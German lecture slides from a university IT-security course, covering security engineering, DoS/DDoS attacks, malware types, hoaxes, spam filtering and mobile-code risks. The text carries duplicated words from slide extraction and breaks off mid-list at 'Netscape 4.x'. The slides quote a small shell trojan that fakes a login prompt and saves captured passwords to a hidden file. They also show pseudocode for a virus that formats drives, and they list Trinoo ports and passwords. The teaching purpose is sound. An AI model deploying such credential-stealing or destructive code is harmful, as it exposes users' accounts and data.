© Helmut Reiser, Institut für Informatik, LMU ITIT--SicherheitSicherheit 1
IT IT - - Sicherheit Sicherheit
-
- Sicherheit vernetzter Systeme Sicherheit vernetzter Systeme - -
Kapitel 3: Security Engineering
Inhalt (1) Inhalt (1)
1. Security Engineering – Vorgehensmodell
2. Sicherheitsprobleme: Handelnde Personen, Notation
3. Bedrohungen, Angriffe und Gefährdungen
1.
Denial of Service
2.
Distributed Denial of Service
3.
Malicious Code
Q
Viren
Q
Würmer
Q
Trojanische Pferde
4.
Hoax und Spam
5.
Mobile Code
Q
ActiveX
Q
JavaScript
Q
Java mit Ausblick auf die Java Sicherheitsarchitektur
© Helmut Reiser, Institut für Informatik, LMU ITIT--SicherheitSicherheit 3
Inhalt (2) Inhalt (2)
3. Bedrohungen, Angriffe und Gefährdungen (Forts.)
6.
Buffer Overflow
7.
Account / Password Cracking
8.
Hintertüren / Falltüren
9.
Rootkits
10.
Sniffer
11.
Port Scanner
4. „Twenty Most Vulnerabilities“
5. Zusammenfassung
3
3 SecuritySecurity--EngineeringEngineering
© Helmut Reiser, Institut für Informatik, LMU ITIT--SicherheitSicherheit 4
Security Engineering: Vorgehensmodell Security Engineering: Vorgehensmodell
Q
Ziel: Sicheres System, sichere Infrastruktur
Q
Strukturiertes Vorgehen um das Ziel zu erreichen:
1. Bestandsaufnahme der Ressourcen (Systeme, Dienste, Daten,...)
2. Bedrohungsanalyse:
Welchen potentiellen Gefahren drohen diesen Ressourcen?
Welche Angriffe x sind möglich?
3. Bestimmung der Schadens- wahrscheinlichkeit E(x) (Erwartungswert) für jeden möglichen Angriff
4. Bestimmung der Schadenshöhe S(x)
5. Errechnung des Risikos R(x) = E(x) * S(x)
6. Risiko-Priorisierung
7. Ableitung von
Sicherheitsanforderungen
8. Erstellung einer Sicherheits- Policy
9. Auswahl von Mechanismen zur Durchsetzung der
Sicherheitsanforderungen
10.Implementierung und Betrieb
11.Dokumentation
Q
Dieses Vorgehen ist nicht streng sequentiell
Q
Analog zu SW-Engineering Modellen sind Zyklen und Iterationen möglich
Q
Sec.Eng. ist fortwährender Prozeß
3.1 Vorgehensmodell 3.1 Vorgehensmodell
© Helmut Reiser, Institut für Informatik, LMU ITIT--SicherheitSicherheit 5
Handelnde Personen Handelnde Personen
Q
Um Sicherheitsprobleme und -protokolle zu erläutern werden häufig die folgenden Personen verwendet
Q
Die „Guten“
T Alice (A)
Initiator eines Protokolls
T Bob (B)
antwortet auf Anfragen von Alice
T Carol (C) and Dave (D)
Teilnehmer in drei- oder vier-Wege Protokollen
T Trent (T)
Vertrauenswürdiger Dritter (Trusted arbitrator)
T Walter (W)
Wächter (Warden), bewacht A. und B.
Q
Die „Bösen“
T Eve (E)
Eavesdropper; Abhörender
T Mallory, Mallet (M)
Malicious attacker; Angreifer Q
Bsp.: Abhören der Kommunikation
zwischen A. und B. (UML Sequence Diagram)
AliceAlice
EveEve Bob
BobSend Send messagemessage Send
Send answeranswer
Zeit Zeit
3.2 Sicherheitsprobleme, Notation 3.2 Sicherheitsprobleme, Notation
Inhalt (1) Inhalt (1)
1. Security Engineering – Vorgehensmodell
2. Sicherheitsprobleme: Handelnde Personen, Notation
3. Bedrohungen, Angriffe und Gefährdungen
1.
Denial of Service
2.
Distributed Denial of Service
3.
Malicious Code
Q
Viren
Q
Würmer
Q
Trojanische Pferde
4.
Hoax und Spam
5.
Mobile Code
Q
ActiveX
Q
JavaScript
Q
Java mit Ausblick auf die Java Sicherheitsarchitektur
© Helmut Reiser, Institut für Informatik, LMU ITIT--SicherheitSicherheit 7
Bedrohungsanalyse: Bedrohungen und Angriffe Bedrohungsanalyse: Bedrohungen und Angriffe
Q
IT Systeme sind Bedrohungen (Threats) ausgesetzt:
T Unberechtigter Zugriff auf Daten
T Diebstahl, Modifikation, Zerstörung
T Störung der Verfügbarkeit, Ressourcen unbenutzbar machen Q
Angriff (Attack)
Unberechtigter Zugriff auf ein System (oder der Versuch)
T Passiver Angriff
Angreifer kann nur Informationen erlangen diese aber nicht ändern
T Aktiver Angriff
Angreifer kann Daten und/oder Systeme manipulieren
T Social Engineering
Angreifer erlangt Daten indem er
„menschliche Schwäche“ ausnutzt
Q
Beispiele für Angriffe
T Abhören (Eavesdropping, wiretapping, sniffing)
T Maskerade (Masquerade) Mallet behauptet Allice zu sein
T Brechen von Accounts (z.B. root)
T Ressourcenmissbrauch; Diebstahl von Rechten
T Kommunikationsangriffe:
Änderung, Kopie, Wiederein- spielung, Fälschung, Umleitung, Verzögerung, Löschung von Nachrichten
T Denial of service (DoS), Distributed DoS (DDoS)
Berechtigte Nutzer können Dienste nicht mehr nutzen
3.3 Bedrohungen, Angriffe, Gef 3.3 Bedrohungen, Angriffe, Gefäährdungenhrdungen
© Helmut Reiser, Institut für Informatik, LMU ITIT--SicherheitSicherheit 8
Angriffe und Gef
Angriffe und Gefä ährdungen ( hrdungen (Ü Ü bersicht) bersicht)
Q
Denial of Service (DoS), Distributed DoS (DDoS)
Q
Malicious Software (Malware)
T Virus
T Wurm
T Trojanisches Pferd
T “Mobile” Code
Q
Überwindung der Zugriffskontrolle
Q
Abhören und Sniffer
Q
Port Scanning
Q
Exploits
T Buffer Overflows
T Account/Password Cracking
T Rootkits
T Hintertüren (Backdoors)
Q
Social Engineering
T Telefonanrufe
T Täuschung
T Videoüberwachung
T „Shoulder surfing“
T „Dumpster diving“ (Tauchen im Abfalleimer)
T ...
3.3 Bedrohungen, Angriffe, Gef 3.3 Bedrohungen, Angriffe, Gefäährdungenhrdungen
© Helmut Reiser, Institut für Informatik, LMU ITIT--SicherheitSicherheit 9
Denial
Denial of Service (DoS of Service ( DoS) and ) and DDoS DDoS
Q
Angriff versucht Zielsystem oder Netzwerk für berechtigte Anwender unbenutzbar zu machen, z.B. durch:
T
Überlastung
T
Herbeiführung von Fehlersituation
T
Ausnutzung von Programmierfehlern oder Protokollschwächen (Bugs)
QArten von DoS
T
Anforderung bzw. Nutzung beschränkter oder unteilbarer Ressourcen des OS (z.B. CPU-Zeit, Plattenplatz, Bandbreite,….)
T
Zerstörung oder Veränderung der Konfiguration
T
Physikalische Zerstörung oder Beschädigung
QBeispiel:
T
Angestellter “konfiguriert” “Vacation” Mail mit cc: an interne Mailingliste Außerdem konfiguriert er automatische Bestätigung durch Empfänger
Mailstorm
3.3 Bedrohungen, Angriffe, Gef 3.3 Bedrohungen, Angriffe, Gefäährdungenhrdungen
DoS DoS Beispiele Beispiele
Q
E-mail Bombing:
Überflutung der Inbox mit Mails
Q
E-mail Subscription Bombing:
Opfer wird auf hunderten Mailinglisten registriert
Q
Buffer Overflows; am Bsp. von Ping of Death
T IP-Paket größer als die max.
erlaubten 2^16 Bytes
T Übertragen in mehreren fragmen- tierten Paketen (Andernfalls würden die Router das Paket verwerfen.)
T Reassemblieren am Zielsystem, führt zu Überlauf des internen Puffers im IP-Stack
T Evtl. Absturz des Betriebssystems
Q
Ausnutzung von Programm- fehlern
T Land: gefälschtes IP Packet mit IP Source Adr. = IP Destination Adr. und Source Port = Dest. Port
100 % CPU Last bei best.
Implementierungen
T Teardrop: Fragmentierte Pakete enthalten Feld Fragment Offset Hier Manipulation, so dass sich Fragmente “überlappen”
u.U. Absturz des Systems Q
“Konsum” von Bandbreite bzw.
Betriebssystem-Ressourcen
T Fluten des Netzwerkes des Opfers (z.B. SMURF)
T UDP chargen/echoAngriff
T SYN-Flooding
© Helmut Reiser, Institut für Informatik, LMU ITIT--SicherheitSicherheit 11
DoS- DoS -Techniken Techniken: SMURF : SMURF
Q
Angreifer sendet Strom von ping Packeten (ICMP) mit gefälschter
Absender-Adresse (alice.victim.com) (Adressfälschung wird auch als IP-Spoofing bezeichnet) an IP-Broadcast Adresse von stooge.com
Q
Alle Rechner aus dem Netz von stooge.com antworten an
alice.victim.comInternet
Internet
stooge.com stooge.com
attacker.com attacker.com
victim.com victim.com
alice.victim.com alice.victim.com
3.3 Bedrohungen, Angriffe, Gef 3.3 Bedrohungen, Angriffe, Gefäährdungenhrdungen mallet.attacker.com
mallet.attacker.com
© Helmut Reiser, Institut für Informatik, LMU ITIT--SicherheitSicherheit 12
Gegenma
Gegenma ßnahmen? ß nahmen?
Q
ICMP deaktivieren (nur bedingt möglich und sinnvoll)
Q
IP-Broadcast am Router deaktivieren
a
Problem DDoS: nicht ein Angreifer sondern sehr viele Angreifer, die nicht Broadcast sondern versch. Rechner verwenden, oder alice direkt angreifen
Internet
Internet
stooge.com stooge.com
victim.com victim.com
alice.victim.com alice.victim.com
3.3 Bedrohungen, Angriffe, Gef 3.3 Bedrohungen, Angriffe, Gefäährdungenhrdungen mallet.attacker.com
mallet.attacker.com
© Helmut Reiser, Institut für Informatik, LMU ITIT--SicherheitSicherheit 13
DoS- DoS -Techniken Techniken: SYN : SYN Flooding Flooding
Q
TCP 3-Way Handshake zum Verbindungsaufbau
Q
SYN Flooding
Alice
Alice
BobBob
SYN SYN SeqNr=ySeqNr=y; ACK x+1; ACK x+1 SYN SYN SeqNr=xSeqNr=x
ACK SeqNr=y+1 ACK SeqNr=y+1
Allokation Allokation von von Ressourcen Ressourcen
T Soviele „halboffene“ TCP- Verbindungen aufbauen bis Ressorucen von Bob erschöpft sind
Mallet
Mallet Bob
BobSYN SeqNr=ySYN SeqNr=y; ACK x+1; ACK x+1 SYN SeqNr=xSYN SeqNr=x
Allokation Allokation von von Ressourcen Ressourcen SYN SeqNr=zSYN SeqNr=z
SYN
SYN SeqNr=aSeqNr=a
3.3 Bedrohungen, Angriffe, Gef 3.3 Bedrohungen, Angriffe, Gefäährdungenhrdungen
SYN- SYN -Flood Flood.: Verletzlichkeit der Betriebssysteme .: Verletzlichkeit der Betriebssysteme
Q
Minimale Anzahl von SYN Paketen für erfolgreichen DoS
Quelle: [Chang 02]
Q
Wiederholung von „verlorenen“
SYN Paketen:
T Exponential Backoff zur Berechnung der Wartezeit
O Linux und W2K (3s, 6s, 12s, 24s,....)
O BSD
(6s, 24s, 48s, ....)
T Abbruch des Retransmit
O W2K
nach 2 Versuchen (d.h. nach 9 Sekunden)
O Linux
nach 7 Versuchen (d.h. nach 381 Sekunden)
O BSD
nach 75 Sekunden
© Helmut Reiser, Institut für Informatik, LMU ITIT--SicherheitSicherheit 15
SYN Flooding SYN Flooding: Gegenma : Gegenmaß ßnahmen? nahmen?
Q
SYN Cookies:
Sequ.Nr. y von Bob „kodiert“ Adressinfo von Mallet. Ressourcen werden erst reserviert wenn tatsächliches ACK y+1 von Mallet eingeht
a Schützt nicht vor „Brute-Force“ Überflutung des Netzes Mallet
Mallet Bob
BobSYN
SYN SeqNr=ySeqNr=y; ACK x+1; ACK x+1 SYN
SYN SeqNr=xSeqNr=x
Allokation Allokation von von Ressourcen Ressourcen SYN
SYN SeqNr=zSeqNr=z
SYN SeqNr=aSYN SeqNr=a
3.3 Bedrohungen, Angriffe, Gef 3.3 Bedrohungen, Angriffe, Gefäährdungenhrdungen
Q
Timer definieren:
Falls ACK nicht innerhalb dieser Zeitspanne erfolgt, Ressourcen wieder freigeben
a Nutzt nur bedingt
Falls alle Ressourcen belegt zufällig eine halboffene Verbindung schliessen
a Nutzt nur bedingt
Q
Maximale Anzahl gleichzeitig halboffener Verbindungen pro Quell-Adresse festlegen
a Problem DDoS
© Helmut Reiser, Institut für Informatik, LMU ITIT--SicherheitSicherheit 16
Einschub: US
Einschub: US- -CERT Alert CERT Alert TA05 TA05- -117A 117A
Q
Oracle Products contain multiple vulnerabilities
Q
Systems affected: various versions of Oracle DB Server; Application Server; E-Business Suite; Enterprise Manager; Peoplesoft EnterpriseOne &
OneWorldXe
QDescription:
T
Oracle released a critical patch in April that addresses more than 70 vulnerabilities in different Oracle products and components
Q
Impact: (depends on product or component)
T
Remote execution of arbitrary code or commands
T
Information disclosure
T
DoS
QSolution:
T
Apply a patch or upgrade
QWorkaround:
T
Disable or remove unneccessary components; restrict network access
© Helmut Reiser, Institut für Informatik, LMU ITIT--SicherheitSicherheit 17
Distributed
Distributed Denial Denial of Service ( of Service ( DDoS) DDoS )
Q
Historie:
T Trinoo erstmals im Juli 99 aufgetaucht; Aug. 99: 227 Clients greifen eine Maschine der Uni Minnesota an (2 Tage Down-Zeit)
T 7. Feb. 2000: Yahoo 3 Stunden Downzeit (Schaden ~ 500.000 $)
T 8. Feb. 2000: Buy.com, CNN, eBay, Zdnet.com, Schwab.com, E*Trade.com und Amazon.
(Bei Amazon 10 Stunden Downzeit und ~ 600.000 $ Schaden) Q
Idee:
DoS Angriffswerkzeuge werden auf mehrere Maschinen verteilt und führen auf Befehl eines Masters Angriff durch.
Q
Terminologie
T Intruder oder Attacker:
Angreifer (Person)
T Master oder Handler:
Koordinator des Angriffs (Software)
T Daemon, Agent, Client, Zombie oder bcast Programm:
Einzelkomponente die Teil des DDos durchführt (Software)
T Victim oder Target:
Ziel des Angriffs Q
Beispiele:
T Trinoo (Trin00)
T Tribe Flood Network (TFN) und TFN2K
T Stacheldraht
3.3 Bedrohungen, Angriffe, Gef 3.3 Bedrohungen, Angriffe, Gefäährdungenhrdungen
DDoS: Grunds DDoS : Grundsä ätzlicher Ablauf tzlicher Ablauf
Q
Dreistufiges Verfahren:
1. Intruder findet Maschine(n) die kompromittiert werden können;
Hacking Werkzeuge, Scanner, Rootkits, DoS/DDoS Tools werden installiert; Maschine wird Master
Internet
Internet
Intruder
Intruder
MasterMaster
Victim
Victim
© Helmut Reiser, Institut für Informatik, LMU ITIT--SicherheitSicherheit 19
DDoS DDoS Phase 2: Initial Phase 2: Initial- -Mass Mass Intrusion Intrusion
2. Master versucht „automatisch“ weitere Maschinen zu kompromittieren um DDoS Daemon zu installieren
Internet
Internet
Intruder
Intruder
MasterMaster
DaemonsDaemons
Daemons
Daemons
DaemonDaemon
Victim
Victim
3.3 Bedrohungen, Angriffe, Gef 3.3 Bedrohungen, Angriffe, Gefäährdungenhrdungen
© Helmut Reiser, Institut für Informatik, LMU ITIT--SicherheitSicherheit 20
DDoS DDoS Phase 3 Phase 3 : Angriff : Angriff
3. Intruder startet Programm auf Master, das allen Daemonen mitteilt wann und gegen wen der Angriff zu starten ist.
Zu vereinbartem Zeitpunkt startet jeder Daemon DoS Angriff
Internet
Internet
Intruder
Intruder
MasterMaster
DaemonsDaemons
Daemons
Daemons
DaemonDaemon
Victim
Victim
3.3 Bedrohungen, Angriffe, Gef 3.3 Bedrohungen, Angriffe, Gefäährdungenhrdungen
© Helmut Reiser, Institut für Informatik, LMU ITIT--SicherheitSicherheit 21
DDos DDos Beispiele: TrinOO Beispiele: TrinOO, TFN u. Stacheldraht , TFN u. Stacheldraht
Q
Trinoo oder Trin00
T Verteilter SYN Flooding Angriff Q
Kommunikation:
T Intruder -> Master: Master hört auf TCP Port 27665; Passwort
„betaalmostdone“
T Sonstiges Passwort: „l44adsl“
T Master -> Daemon: Daemon auf UDP Port 27444
T Daemon -> Master: Master auf UDP Port 31335
Beim Start *HELLO*Nachricht des Daemon
T Kepp-Alive Kommunikation:
Master -> Daemon: png Daemon -> Master: PONG
Q
Tribe Flood Network (TFN)
T Master kompromittiert UNIX Systeme über RPC Buffer Overflow
T SYN, ICMP, UDP Flooding
T SMURF Angriff Q
Kommunikation:
T wird vollständig in ICMP ECHOund ICMP REPLYNachrichten
„versteckt“:
Kommando wird im Identifier Feld des ICMP Paketes kodiert; z.B.
345 -> SYN Flooding;
890 –> UDP Flooding;
T Kein Passwort-Schutz
Q
Stacheldraht = Trinoo + TFN + verschlüsselte Kommunikation + Auto-Update des Agenten
3.3 Bedrohungen, Angriffe, Gef 3.3 Bedrohungen, Angriffe, Gefäährdungenhrdungen
DoS DoS Schutz Schutz - - und Gegenmaß und Gegenma ßnahmen nahmen
Q
Zusammenarbeit um Verbreitung der Tools und Durchführung der Angriffe zu verhindern
Q
Monitoring und Intrusion Detection
Q
Packetfilter auf Gateways und Routern (ingress und egress;
vgl. Abschnitt über Firewalls)
Q
Überwachung von Volumen und Anzahl der Verbindungen pro Quell-Adresse
Q
Überwachung und Kontrolle der offenen Ports
Q
Blockieren von Broadcast
Q
Ggf. blockieren von ICMP
Q
Relevante Patches installieren
Q
Meldung an Provider aus dessen Netz DoS erfolgt
Q
Bug- und Sicherheitswarnungen (z.B. CERT) verfolgen
© Helmut Reiser, Institut für Informatik, LMU ITIT--SicherheitSicherheit 23
Malicious
Malicious Code: Virus Code: Virus
Q
Definition:
T
Befehlsfolge; benötigt Wirtsprogramm zur Ausführung
T
Kein selbstständig ablauffähiges Programm
T
Selbstreplikation (Infektion weiterer Wirte (Programme))
QAllgemeiner Aufbau:
Viruserkennung Viruserkennung
Infektionsteil Infektionsteil Schadensteil Schadensteil ggf. mit Bedingung ggf. mit Bedingung Sprung
Sprung
void
voidfunctionfunctionvirusvirus{{ signature signature
suche Programm p ohne suche Programm p ohne signaturesignature kopiere
kopiere virusvirusin pin p
if
if(tag == Freitag && (tag == Freitag && monatstagmonatstag== 13) {== 13) { format
formatc: d: e: f: g: h: i: j: k: l: m: }c: d: e: f: g: h: i: j: k: l: m: }
springe an den Anfang des Wirtsprogramm springe an den Anfang des Wirtsprogramm }
}
T
Daneben ggf. Tarnungsteil
3.3 Bedrohungen, Angriffe, Gef 3.3 Bedrohungen, Angriffe, Gefäährdungenhrdungen
© Helmut Reiser, Institut für Informatik, LMU ITIT--SicherheitSicherheit 24
Programm
Programm- -Viren: Infektion Viren: Infektion
Q
Dateiformat vor der Infektion
QDatei nach der Infektion
Name der Datei Name der Datei L
Läänge der Dateinge der Datei Einsprungadresse Einsprungadresse Programmcode Programmcode
Faxsend.exe Faxsend.exe 9488
9488 10041004 1004:
1004: loadload...
1005:
1005: addadd...
...
9488:
9488: RetRet
Faxsend.exe Faxsend.exe 9889
9889 94899489 1004:
1004: loadload...
1005:
1005: addadd...
...
9488:
9488: RetRet Viruscode Viruscode 9489:
9489: multmult...
...
9889:jmp 1004 9889:jmp 1004
3.3 Bedrohungen, Angriffe, Gef 3.3 Bedrohungen, Angriffe, Gefäährdungenhrdungen
© Helmut Reiser, Institut für Informatik, LMU ITIT--SicherheitSicherheit 25
Viren Klassifikation Viren Klassifikation
Q
Klassifikation nach Infektionsziel:
T Programm-Virus (Link-Virus) Infiziert ausführbare Dateien (.exe, .com, .sys)
T Bootsektor-Virus
Infiziert den Bootsektor von Festplatten oder Disketten
T Makro-, Daten-Virus Infiziert „Daten-Dateien“ mit eingebetteten Makro-Sprachen (z.B. Visual Basic in MS Office, Postscript,...)
Q
Unterklassen:
T Multipartiter Virus Infiziert mehr als ein Ziel
T Polymorpher Virus
Verschlüsselt den Viruscode; damit für Anti-Viren Software (AV) schwerer zu finden
T Retro-Virus
Greift aktiv AV an; versucht Scanner so zu verändern, dass er unentdeckt bleibt.
T Stealth Virus
Virus versucht sich vor AV zu verstecken. Sobald AV Dateien scannt, entfernt der Virus seinen Code aus den infizierten Dateien (Wiederherstellung des
Orginalzustandes)
T Tunneling-Virus
AV versucht Systemaufrufe zum Schreiben in den Bootsektor zu unterbrechen. Virus ermittelt dabei direkte Speicheradresse des entsprechenden Systemaufrufs und „klinkt“ sich direkt an dieser Speicheradresse ein.
3.3 Bedrohungen, Angriffe, Gef 3.3 Bedrohungen, Angriffe, Gefäährdungenhrdungen
Malicious
Malicious Code: Wurm Code: Wurm
Q
Definition
T
Eigenständig ablauffähiges Programm
T
Benötigt keinen Wirt
T
Selbstreplikation
T
(besteht aus mehreren Programmteilen = Wurm-Segmente)
QBsp.:
T
Internet Wurm, vgl. Kap. 1
T
ILOVEYOU
T
Melissa
T
SQL Slammer
T
...
© Helmut Reiser, Institut für Informatik, LMU ITIT--SicherheitSicherheit 27
Malicious
Malicious Code: Trojanisches Pferd Code: Trojanisches Pferd
Q
Definition:
T Ein Programm dessen Ist-Funktionalität nicht mit der angegebenen Soll- Funktionalität übereinstimmt
OSinnvolle oder attraktive „Nutzfunktionalität“
OVersteckte (Schad-) Funktionalität
OKeine Vervielfältigung
Q
Beispiel: Unix Shell Script Trojan [Stoll 89]:
echo “WELCOME TO THE LBL UNIX-4 COMPUTER”
echo “LOGIN:”
read account_name echo “PASSWORD:”
(stty -echo;\
read password;\
stty echo; echo “”;\
echo $account_name $password >> /tmp/.pub) echo “SORRY, TRY AGAIN.”
3.3 Bedrohungen, Angriffe, Gef 3.3 Bedrohungen, Angriffe, Gefäährdungenhrdungen
© Helmut Reiser, Institut für Informatik, LMU ITIT--SicherheitSicherheit 28
Trojanische Pferde, Beispiele Trojanische Pferde, Beispiele
Q
Rundung bei der Zinsberechnung
T Nutzfunktion: Zinsberechnung mit drei Stellen Genauigkeit
T Versteckte Funktionalität:
Abgerundete Beträge ab der 4.
Stelle aufsummieren und auf definiertes Konto buchen.
Q
T-Online Power Tools (1998)
T Nutzfunktion: Unterstützende Werkzeuge für den T-Online Decoder
T Versteckte Funktionalität: Bei der Registrierung (Shareware) werden T-Online Zugangsdaten übermittelt
Q
FBI’s Magic Latern / D.I.R.T (Data Interception by Remote Trans- mission) (2001)
T Integrierbar in (Nutzfunktion):
O Word, Excel, Powerpoint
O RTF (Rich Text Format)
O Word Perfect
O Autorun.bat on CDs
O …. ??…..
T Versteckte Funtkionalität:
O Keyboard Logger
O Auslesen entfernter Daten
O Passphrase Logging (z.B., PGP Private Key Passphrase)
O Übertragung des entfernten Bildschirminhalts
O Übertragung v. entferntem Audio (falls Micro. vorhanden)
3.3 Bedrohungen, Angriffe, Gef 3.3 Bedrohungen, Angriffe, Gefäährdungenhrdungen
© Helmut Reiser, Institut für Informatik, LMU ITIT--SicherheitSicherheit 29
Malicious
Malicious Code: Schutz- Code: Schutz - und Gegenmaß und Gegenma ßnahmen nahmen
Q
Keine Software aus „unsicheren“ Quellen installieren
Q
Anti-Viren Software (AV) installieren UND aktualisieren
Q
Firewall um Viren- und Mail-Scanner erweitern
Q
Ausführbare Dateien oder Dateisystem verschlüsseln
Q
Kryptographische Prüfsummen (vgl. Abschnitt Kryptographie)
Q
Integrity Checker installieren und regelmäßig testen (vgl.
Abschnitt Tools)
Q
Schreibrechte sehr restriktiv vergeben (Need to know Prinzip)
Q
Automatische Makro Ausführung deaktivieren
Q
Impfen: In die Programme wird bewusst der Erkennungscode X des Virus eingetragen.
Q
Weniger anfälliges OS wählen
3.3 Bedrohungen, Angriffe, Gef 3.3 Bedrohungen, Angriffe, Gefäährdungenhrdungen
Mail: Falsche Virenwarnungen;
Mail: Falsche Virenwarnungen; Hoaxes Hoaxes
Q
Beispiele: 48 Hours:
QGEZ-Gebührenerstattung:
Die öffentlich-rechtlichen Rundfunkanstalten ARD und ZDF haben im Frühjahr einen Gewinn von über 1 Mrd. DM erwirtschaf- tet. Dieses ist gemäß Bundesver- fassungsgericht unzuläßig. Das OLG Augsburg hat am 10.01.1998 entschieden, daß an diesem Gewinn der Gebührenzahler zu beteiligen ist. Es müssen nach Urteil jedem Antragsteller rückwirkend für die Jahre 1997, 1998 und 1999 je Quartal ein Betrag von DM 9,59 (insgesamt 115,08 DM) erstattet werden.
ACHTUNG! Dieses Urteil wurde vom BGH am 08.04.98 bestätigt.[....]
Bitte möglichst viele Kopien an Verwandte, Freunde und Bekannte weiterleiten, damit die Gebühren auch ihnen erstattet werden.
A virus will be spreading in 48 hours from now!!!! PLEASE BE VERY CAREFUL:
This message arrived today, Microsoft just announced it.
The information said: If you receive an e-mail with the subject Help, don't open it, don't even move your mouse over it or clean it because with only that action a virus will be activated without the necessity to download any file, it is a cyber-terrorism!! Wait 48 hours after you receive the virus in order to clean it, otherwise it will erase your hard disk and BIOS.
This action doesn't have a cure be- cause the computer startup system is affected and you are not to be able to get in the operating system. Note: It can arrive with an unknown name or with one of your contacts' name. VERY URGENT, PASS THIS TO EVERY PERSON WHO HAS YOUR E-MAIL ADDRESS!!!!
© Helmut Reiser, Institut für Informatik, LMU ITIT--SicherheitSicherheit 31
Hoax, m Hoax , mö ö gliche Erkennungszeichen gliche Erkennungszeichen
Q
Warnung vor „extrem gefährlichen Virus“
Q
“Keine AV kann Virus erkennen”
Q
“Warnen Sie alle Bekannten und Freunde”
Q
Nicht plausible Bedrohung
(z.B. physikalische Zerstörung des Rechners)
Q
Verweis auf namhafte Unternehmen oder Forschungseinrichtungen
Q
Kettenbriefe im klassischen Sinn:
T
Gewinnspiele oder Glücksbriefe
T
„Geld zurück“
T
E-Petitionen
T
Pyramidensysteme
T
„Tränendrüsenbriefe“
Q
Schutzmaßnahmen: Hoax Mail löschen und NICHT verbreiten
3.3 Bedrohungen, Angriffe, Gef 3.3 Bedrohungen, Angriffe, Gefäährdungenhrdungen
© Helmut Reiser, Institut für Informatik, LMU ITIT--SicherheitSicherheit 32
SPAM- SPAM -Mail Mail
Q
Unerwünschte Werbe Mail (unsolicited commercial e-mail)
Q
Begriff SPAM
T
SPAM eingetragenes Warenzeichen von Hormel Food
T
„Spam“-Sketch aus Monty Python‘s Flying Circus
QSPAM Aufkommen (August 2002)
T
Laut EU Presseerklärung [EU 03]
T
50 % des weltweiten E-Mail Aufkommens
T
46 % des europäischen E-Mail Aufkommens
QProbleme:
T
Eingangs-Mailbox wird mit SPAM überflutet
T
Extrem störend
T
Zusätzlicher Aufwand (Speicherplatz, Arbeitszeit)
T
Zusätzliche Kosten (Infrastruktur, Übertragung, Personal,....)
© Helmut Reiser, Institut für Informatik, LMU ITIT--SicherheitSicherheit 33
Spam, Gegenma Spam , Gegenmaß ßnahmen: nahmen: Spamfilter Spamfilter
Q
Prozess der eingehende Mails nach Spam durchsucht
Q
Arten von Spam-Filtern:
1.
Blacklist / Whitelist Ansatz:
Sperren Mail Domänen die üblicherweise von Spammer benutzt werden
2.
Regelbasiert:
Nachricht wird inhaltlich nach Spam-Merkmalen durchsucht;
sowohl im Header wie auch im Body der Mail
3.
KI-basierter Ansatz:
Neuronale- (NN-) oder Bayessche Netze versuchen Spam zu erkennen
Q
Vor- u. Nachteile:
1.
Effizient zu implementieren; Grobgranular; keine inhaltliche Prüfung
2.
Sehr hohe Erkennungsraten; Test aufwändiger
3.
Erkennungsrate abhängig vom Training (NN) oder Modellierung (Bayes); dafür große Datenmengen erforderlich
Spamfilter Spamfilter
Q
Fehlerarten bei der Erkennung
T
Filter die „automatisch“ Entscheidungen treffen machen zwei Arten von (systematischen) Fehlern:
T
Falsch positiv: Mail wird als Spam erkannt obwohl keine Spam
T
Falsch negativ: Mail wird nicht als Spam erkannt obwohl Spam
QWelche Fehlerart ist problematischer?
Q
Policy für Spambehandlung:
T
Spam-Mail löschen und Empfänger ggf. benachrichtigen
T
Spam-Mail markieren und dann ausliefern
T
Welche Variante bevorzugen (unter Beachtung der Fehlerarten)?
Q
Bsp.: SpamAssassin (www.spamassassin.org)
T
Implementiert alle Filterarten (Blacklist, Regelbasis, Bayessches Netz)
T
Zentral und dezentral einsetzbar
T
Effizient und effektiv; Feingranular konfigurierbar;
© Helmut Reiser, Institut für Informatik, LMU ITIT--SicherheitSicherheit 35
Malicious
Malicious Code: „ Code: „Mobile Code Mobile Code“ “
Q
Abgrenzung zu Viren, Würmern und Trojaner fließend
Q
Hier - Mobile Code (aktiver Inhalt):
T
Code wird auf entferntem Rechner generiert
T
häufig in Web Seiten eingebettet und
T
auf lokalem Client-Rechner ausgeführt.
T
I.d.R. Ausführungsplattform oder Interpreter zur Ausführung erforderlich
Q
Verwendete Sprachen, z.B.
T
ActiveX
T
JavaScript
T
Java
Mobile Mobile Code Code Ausf
Ausfüührungsplatthrungsplatt-- formform
Betriebssystem
Betriebssystem
HostHost- -Rechner Rechner
Mobile Mobile Code Code Ausf
Ausfüührungsplatthrungsplatt-- formform
Betriebssystem
Betriebssystem
HostHost- -Rechner Rechner
3.3 Bedrohungen, Angriffe, Gef 3.3 Bedrohungen, Angriffe, Gefäährdungenhrdungen
© Helmut Reiser, Institut für Informatik, LMU ITIT--SicherheitSicherheit 36
Mobile Code:
Mobile Code: ActiveX ActiveX
Q
Von Microsoft entwickelte Erweiterung von OLE (Object Linking and Embedding)
Q
ActiveX Control:
T Wiederverwendbare Komponente
T Binärformat
T Standardisierte Schnittstelle
T Beliebige Programmiersprache zur Entwicklung (z.B. C, Basic, C#,…)
T Wird innerhalb des Browsers ausgeführt
Q
Probleme:
T Keine Ausführungsbeschränkung
T Voller Betriebssystemzugriff
T Selbe Rechte wie ausführender Benutzerprozess
Q
Beispiele für ActiveX Malware:
Q
Internet Exploder (1996):
“Signed” ActiveX Control das bei der Ausführung den Rechner
herunterfährt.
Q
Chaos Computer Club (CCC) Demonstrator (27.1.97)
T Control sucht nach Quicken
T Erstellt Überweisung und trägt diese in die Liste offener Überweisungen in Quicken ein.
T Quicken kann mit einer PIN TAN Kombination mehrere
Überweisungen übertragen, d.h.
unvorsichtiger User wird
“gefälschte” Überweisung übertragen
T www.iks-jena.de/mitarb/
lutz/security/activex.html
3.3 Bedrohungen, Angriffe, Gef 3.3 Bedrohungen, Angriffe, Gefäährdungenhrdungen
© Helmut Reiser, Institut für Informatik, LMU ITIT--SicherheitSicherheit 37
Mobile Code: JavaScript Mobile Code: JavaScript
Q
Entwickelt von Netscape
T Scriptsprache; syntaktisch angelehnt an C,C++ u. Java
T Einbettung aktiver Inhalte in Web- Seiten
T Wird innerhalb des Browsers ausgeführt
Q
JavaScript Skript:
T Kein Zugriff auf das Dateisystem (außer auf Cookies)
T Keine Netzverbindungen (außer Download von URLs) Q
Probleme
T Kein explizites Sicherheitsmodell
T Entwicklungsgrundsatz: „Identify (security holes) and patch approach“
Q
Umfangreiche Liste von Schwach- stellen und Implementierungs- fehlern
Q
Netscape 2.x
T Auslesen der History
T Lesender und schreibender Zugriff auf das Dateisystem
Q
Netscape 3.x
T Versenden von Mail Q
Netscape 4.x
